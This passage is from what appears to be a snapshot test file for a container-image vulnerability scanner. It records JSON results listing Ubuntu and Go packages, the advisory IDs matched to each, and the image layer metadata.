"command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 }, { "diff_id": "sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 }, { "diff_id": 
"sha256:...", "command": "RUN |1 MANAGER_VERSION=10...", "is_empty": false, "base_image_index": 0 } ], "base_images": [ {}, { "name": "library/node", "tags": null }, { "name": "ayan4m1/maven-node", "tags": null }, { "name": "alpine", "tags": null }, { "name": "alpine", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_node_modules_using_npm_with_some_packages - 2] Scanning local image tarball "./testdata/test-node_modules-npm-full.tar" --- [TestCommand_OCIImage_JSONFormat/scanning_ubuntu_image - 1] { "results": [ { "source": { "path": "/var/lib/dpkg/status", "type": "os" }, "packages": [ { "package": { "name": "coreutils", "os_package_name": "coreutils", "version": "8.32-4.1ubuntu1.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2016-2781", "UBUNTU-CVE-2025-5278" ] }, { "package": { "name": "dpkg", "os_package_name": "dpkg", "version": "1.21.1ubuntu2.3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7768-1", "UBUNTU-CVE-2025-6297", "UBUNTU-CVE-2026-2219" ] }, { "package": { "name": "gcc-12", "os_package_name": "gcc-12-base", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "gnupg2", "os_package_name": "gpgv", "version": "2.2.27-3ubuntu2.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 5, "vulnerabilities": [ "USN-7412-1", "USN-7946-1", "UBUNTU-CVE-2022-3219", "UBUNTU-CVE-2025-30258", "UBUNTU-CVE-2025-68972", "UBUNTU-CVE-2025-68973", "USN-7412-2" ] }, { "package": { "name": "util-linux", "os_package_name": "libblkid1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": 
"glibc", "os_package_name": "libc-bin", "version": "2.35-0ubuntu3.8", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-8005-1", "USN-7259-1", "USN-7541-1", "USN-7760-1", "UBUNTU-CVE-2016-20013", "UBUNTU-CVE-2025-0395", "UBUNTU-CVE-2025-15281", "UBUNTU-CVE-2025-4802", "UBUNTU-CVE-2025-8058", "UBUNTU-CVE-2026-0861", "UBUNTU-CVE-2026-0915" ] }, { "package": { "name": "glibc", "os_package_name": "libc6", "version": "2.35-0ubuntu3.8", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-8005-1", "USN-7259-1", "USN-7541-1", "USN-7760-1", "UBUNTU-CVE-2016-20013", "UBUNTU-CVE-2025-0395", "UBUNTU-CVE-2025-15281", "UBUNTU-CVE-2025-4802", "UBUNTU-CVE-2025-8058", "UBUNTU-CVE-2026-0861", "UBUNTU-CVE-2026-0915" ] }, { "package": { "name": "libcap2", "os_package_name": "libcap2", "version": "1:2.44-1ubuntu0.22.04.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-7287-1", "UBUNTU-CVE-2025-1390" ] }, { "package": { "name": "gcc-12", "os_package_name": "libgcc-s1", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "libgcrypt20", "os_package_name": "libgcrypt20", "version": "1.9.4-3ubuntu3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2024-2236" ] }, { "package": { "name": "gnutls28", "os_package_name": "libgnutls30", "version": "3.7.3-4ubuntu1.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7635-1", "USN-8043-1", "USN-7281-1", "UBUNTU-CVE-2024-12243", "UBUNTU-CVE-2025-14831", "UBUNTU-CVE-2025-32988", "UBUNTU-CVE-2025-32989", "UBUNTU-CVE-2025-32990", "UBUNTU-CVE-2025-6395", 
"UBUNTU-CVE-2025-9820" ] }, { "package": { "name": "krb5", "os_package_name": "libgssapi-krb5-2", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libk5crypto3", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libkrb5-3", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libkrb5support0", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "lz4", "os_package_name": "liblz4-1", "version": "1.9.3-2build2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2025-62813" ] }, { "package": { "name": "util-linux", "os_package_name": "libmount1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { 
"index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "ncurses", "os_package_name": "libncurses6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "ncurses", "os_package_name": "libncursesw6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "pam", "os_package_name": "libpam-modules", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam-modules-bin", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam-runtime", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam0g", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pcre2", "os_package_name": "libpcre2-8-0", "version": "10.39-3ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2022-41409" ] }, { 
"package": { "name": "pcre3", "os_package_name": "libpcre3", "version": "2:8.39-13ubuntu0.22.04.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2017-11164" ] }, { "package": { "name": "util-linux", "os_package_name": "libsmartcols1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.0.2-0ubuntu1.18", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 6, "vulnerabilities": [ "USN-7980-1", "USN-7786-1", "USN-7278-1", "UBUNTU-CVE-2024-13176", "UBUNTU-CVE-2024-41996", "UBUNTU-CVE-2024-9143", "UBUNTU-CVE-2025-15467", "UBUNTU-CVE-2025-27587", "UBUNTU-CVE-2025-68160", "UBUNTU-CVE-2025-69418", "UBUNTU-CVE-2025-69419", "UBUNTU-CVE-2025-69420", "UBUNTU-CVE-2025-69421", "UBUNTU-CVE-2025-9230", "UBUNTU-CVE-2026-22795", "UBUNTU-CVE-2026-22796", "UBUNTU-CVE-2026-2673" ] }, { "package": { "name": "gcc-12", "os_package_name": "libstdc++6", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "systemd", "os_package_name": "libsystemd0", "version": "249.11-0ubuntu3.12", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7559-1", "UBUNTU-CVE-2023-7008", "UBUNTU-CVE-2025-4598", "UBUNTU-CVE-2026-4105" ] }, { "package": { "name": "libtasn1-6", "os_package_name": "libtasn1-6", "version": "4.18.0-4build1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7954-1", "USN-7275-1", "UBUNTU-CVE-2021-46848", "UBUNTU-CVE-2024-12133", "UBUNTU-CVE-2025-13151" ] }, { "package": { "name": "ncurses", "os_package_name": 
"libtinfo6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "systemd", "os_package_name": "libudev1", "version": "249.11-0ubuntu3.12", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7559-1", "UBUNTU-CVE-2023-7008", "UBUNTU-CVE-2025-4598", "UBUNTU-CVE-2026-4105" ] }, { "package": { "name": "util-linux", "os_package_name": "libuuid1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "libzstd", "os_package_name": "libzstd1", "version": "1.4.8+dfsg-3build1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2022-4899" ] }, { "package": { "name": "shadow", "os_package_name": "login", "version": "1:4.8.1-2ubuntu2.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-29383", "UBUNTU-CVE-2024-56433" ] }, { "package": { "name": "util-linux", "os_package_name": "mount", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-base", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "ncurses", "os_package_name": "ncurses-bin", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "shadow", "os_package_name": "passwd", 
"version": "1:4.8.1-2ubuntu2.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-29383", "UBUNTU-CVE-2024-56433" ] }, { "package": { "name": "perl", "os_package_name": "perl-base", "version": "5.34.0-3ubuntu1.3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7434-1", "USN-7678-1", "UBUNTU-CVE-2023-31486", "UBUNTU-CVE-2023-47039", "UBUNTU-CVE-2024-56406", "UBUNTU-CVE-2025-40909" ] }, { "package": { "name": "tar", "os_package_name": "tar", "version": "1.34+dfsg-1ubuntu0.1.22.04.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2025-45582" ] }, { "package": { "name": "util-linux", "os_package_name": "util-linux", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "zlib", "os_package_name": "zlib1g", "version": "1:1.2.11.dfsg-2ubuntu9.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2026-27171" ] } ] } ], "experimental_config": { "licenses": { "summary": false, "allowlist": null } }, "image_metadata": { "os": "Ubuntu 22.04.5 LTS", "layer_metadata": [ { "diff_id": "", "command": "/bin/sh -c #(nop) ARG RELEASE", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) ARG LAUNCHPAD_BUILD_ARCH", "is_empty": true, "base_image_index": 2 }, { "diff_id": "", "command": "/bin/sh -c #(nop) LABEL org.opencontainers.image.ref.name=ubuntu", "is_empty": true, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) LABEL org.opencontainers.image.version=22.04", "is_empty": true, "base_image_index": 1 }, { "diff_id": "sha256:...", "command": "/bin/sh -c #(nop) ADD file:1b6c8c9518be42fa2afe5e241ca31677fce58d27cdfa88baa91a65a259be3637 in 
/ ", "is_empty": false, "base_image_index": 1 }, { "diff_id": "", "command": "/bin/sh -c #(nop) CMD [/"/bin/bash/"]", "is_empty": true, "base_image_index": 1 } ], "base_images": [ {}, { "name": "ubuntu", "tags": null }, { "name": "laurentsogeti/pod_showname_formation_ckad", "tags": null } ] } } --- [TestCommand_OCIImage_JSONFormat/scanning_ubuntu_image - 2] Scanning local image tarball "./testdata/test-ubuntu.tar" --- [TestCommand_OCIImage_JSONFormat/ubuntu_image_with_go_OS_packages_json - 1] { "results": [ { "source": { "path": "/usr/bin/fzf", "type": "artifact" }, "experimental_pes": [ { "Plugin": "vex/os-duplicate/dpkg", "Justification": 1, "VulnIdentifiers": null, "MatchesAllVulns": true } ], "packages": [ { "package": { "name": "stdlib", "version": "1.18.1", "ecosystem": "Go", "image_origin_details": { "index": 7 } }, "groups": 84, "vulnerabilities": [ "GO-2022-0477", "GO-2022-0493", "GO-2022-0515", "GO-2022-0520", "GO-2022-0521", "GO-2022-0522", "GO-2022-0523", "GO-2022-0524", "GO-2022-0525", "GO-2022-0526", "GO-2022-0527", "GO-2022-0531", "GO-2022-0532", "GO-2022-0533", "GO-2022-0537", "GO-2022-0969", "GO-2022-1037", "GO-2022-1038", "GO-2022-1039", "GO-2022-1095", "GO-2022-1143", "GO-2022-1144", "GO-2023-1568", "GO-2023-1569", "GO-2023-1570", "GO-2023-1571", "GO-2023-1621", "GO-2023-1702", "GO-2023-1703", "GO-2023-1704", "GO-2023-1705", "GO-2023-1751", "GO-2023-1752", "GO-2023-1753", "GO-2023-1840", "GO-2023-1878", "GO-2023-1987", "GO-2023-2041", "GO-2023-2043", "GO-2023-2102", "GO-2023-2185", "GO-2023-2186", "GO-2023-2375", "GO-2023-2382", "GO-2024-2598", "GO-2024-2599", "GO-2024-2600", "GO-2024-2609", "GO-2024-2610", "GO-2024-2687", "GO-2024-2887", "GO-2024-2888", "GO-2024-2963", "GO-2024-3105", "GO-2024-3106", "GO-2024-3107", "GO-2025-3373", "GO-2025-3420", "GO-2025-3447", "GO-2025-3563", "GO-2025-3750", "GO-2025-3751", "GO-2025-3849", "GO-2025-3956", "GO-2025-4006", "GO-2025-4007", "GO-2025-4008", "GO-2025-4009", "GO-2025-4010", "GO-2025-4011", 
"GO-2025-4012", "GO-2025-4013", "GO-2025-4014", "GO-2025-4015", "GO-2025-4155", "GO-2025-4175", "GO-2026-4337", "GO-2026-4340", "GO-2026-4341", "GO-2026-4342", "GO-2026-4403", "GO-2026-4601", "GO-2026-4602", "GO-2026-4603" ] } ] }, { "source": { "path": "/var/lib/dpkg/status", "type": "os" }, "packages": [ { "package": { "name": "coreutils", "os_package_name": "coreutils", "version": "8.32-4.1ubuntu1.2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2016-2781", "UBUNTU-CVE-2025-5278" ] }, { "package": { "name": "dpkg", "os_package_name": "dpkg", "version": "1.21.1ubuntu2.3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7768-1", "UBUNTU-CVE-2025-6297", "UBUNTU-CVE-2026-2219" ] }, { "package": { "name": "gcc-12", "os_package_name": "gcc-12-base", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "gnupg2", "os_package_name": "gpgv", "version": "2.2.27-3ubuntu2.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 5, "vulnerabilities": [ "USN-7412-1", "USN-7946-1", "UBUNTU-CVE-2022-3219", "UBUNTU-CVE-2025-30258", "UBUNTU-CVE-2025-68972", "UBUNTU-CVE-2025-68973", "USN-7412-2" ] }, { "package": { "name": "util-linux", "os_package_name": "libblkid1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "glibc", "os_package_name": "libc-bin", "version": "2.35-0ubuntu3.8", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-8005-1", "USN-7259-1", "USN-7541-1", "USN-7760-1", "UBUNTU-CVE-2016-20013", "UBUNTU-CVE-2025-0395", "UBUNTU-CVE-2025-15281", 
"UBUNTU-CVE-2025-4802", "UBUNTU-CVE-2025-8058", "UBUNTU-CVE-2026-0861", "UBUNTU-CVE-2026-0915" ] }, { "package": { "name": "glibc", "os_package_name": "libc6", "version": "2.35-0ubuntu3.8", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-8005-1", "USN-7259-1", "USN-7541-1", "USN-7760-1", "UBUNTU-CVE-2016-20013", "UBUNTU-CVE-2025-0395", "UBUNTU-CVE-2025-15281", "UBUNTU-CVE-2025-4802", "UBUNTU-CVE-2025-8058", "UBUNTU-CVE-2026-0861", "UBUNTU-CVE-2026-0915" ] }, { "package": { "name": "libcap2", "os_package_name": "libcap2", "version": "1:2.44-1ubuntu0.22.04.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-7287-1", "UBUNTU-CVE-2025-1390" ] }, { "package": { "name": "gcc-12", "os_package_name": "libgcc-s1", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "libgcrypt20", "os_package_name": "libgcrypt20", "version": "1.9.4-3ubuntu3", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2024-2236" ] }, { "package": { "name": "gnutls28", "os_package_name": "libgnutls30", "version": "3.7.3-4ubuntu1.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7635-1", "USN-8043-1", "USN-7281-1", "UBUNTU-CVE-2024-12243", "UBUNTU-CVE-2025-14831", "UBUNTU-CVE-2025-32988", "UBUNTU-CVE-2025-32989", "UBUNTU-CVE-2025-32990", "UBUNTU-CVE-2025-6395", "UBUNTU-CVE-2025-9820" ] }, { "package": { "name": "krb5", "os_package_name": "libgssapi-krb5-2", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", 
"UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libk5crypto3", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libkrb5-3", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "krb5", "os_package_name": "libkrb5support0", "version": "1.19.2-2ubuntu0.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 4, "vulnerabilities": [ "USN-7314-1", "USN-7257-1", "USN-7542-1", "UBUNTU-CVE-2018-5709", "UBUNTU-CVE-2024-26458", "UBUNTU-CVE-2024-26461", "UBUNTU-CVE-2024-3596", "UBUNTU-CVE-2025-24528", "UBUNTU-CVE-2025-3576" ] }, { "package": { "name": "lz4", "os_package_name": "liblz4-1", "version": "1.9.3-2build2", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2025-62813" ] }, { "package": { "name": "util-linux", "os_package_name": "libmount1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "ncurses", "os_package_name": "libncurses6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", 
"UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "ncurses", "os_package_name": "libncursesw6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { "name": "pam", "os_package_name": "libpam-modules", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam-modules-bin", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam-runtime", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pam", "os_package_name": "libpam0g", "version": "1.4.0-11ubuntu2.5", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7580-1", "UBUNTU-CVE-2024-10041", "UBUNTU-CVE-2025-6020", "UBUNTU-CVE-2025-8941" ] }, { "package": { "name": "pcre2", "os_package_name": "libpcre2-8-0", "version": "10.39-3ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2022-41409" ] }, { "package": { "name": "pcre3", "os_package_name": "libpcre3", "version": "2:8.39-13ubuntu0.22.04.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "UBUNTU-CVE-2017-11164" ] }, { "package": { "name": "util-linux", "os_package_name": 
"libsmartcols1", "version": "2.37.2-4ubuntu3.4", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 1, "vulnerabilities": [ "USN-8091-1" ] }, { "package": { "name": "openssl", "os_package_name": "libssl3", "version": "3.0.2-0ubuntu1.18", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 6, "vulnerabilities": [ "USN-7980-1", "USN-7786-1", "USN-7278-1", "UBUNTU-CVE-2024-13176", "UBUNTU-CVE-2024-41996", "UBUNTU-CVE-2024-9143", "UBUNTU-CVE-2025-15467", "UBUNTU-CVE-2025-27587", "UBUNTU-CVE-2025-68160", "UBUNTU-CVE-2025-69418", "UBUNTU-CVE-2025-69419", "UBUNTU-CVE-2025-69420", "UBUNTU-CVE-2025-69421", "UBUNTU-CVE-2025-9230", "UBUNTU-CVE-2026-22795", "UBUNTU-CVE-2026-22796", "UBUNTU-CVE-2026-2673" ] }, { "package": { "name": "gcc-12", "os_package_name": "libstdc++6", "version": "12.3.0-1ubuntu1~22.04", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7700-1", "UBUNTU-CVE-2022-27943", "UBUNTU-CVE-2023-4039" ] }, { "package": { "name": "systemd", "os_package_name": "libsystemd0", "version": "249.11-0ubuntu3.12", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 3, "vulnerabilities": [ "USN-7559-1", "UBUNTU-CVE-2023-7008", "UBUNTU-CVE-2025-4598", "UBUNTU-CVE-2026-4105" ] }, { "package": { "name": "libtasn1-6", "os_package_name": "libtasn1-6", "version": "4.18.0-4build1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "USN-7954-1", "USN-7275-1", "UBUNTU-CVE-2021-46848", "UBUNTU-CVE-2024-12133", "UBUNTU-CVE-2025-13151" ] }, { "package": { "name": "ncurses", "os_package_name": "libtinfo6", "version": "6.3-2ubuntu0.1", "ecosystem": "Ubuntu:22.04", "image_origin_details": { "index": 4 } }, "groups": 2, "vulnerabilities": [ "UBUNTU-CVE-2023-50495", "UBUNTU-CVE-2025-6141" ] }, { "package": { 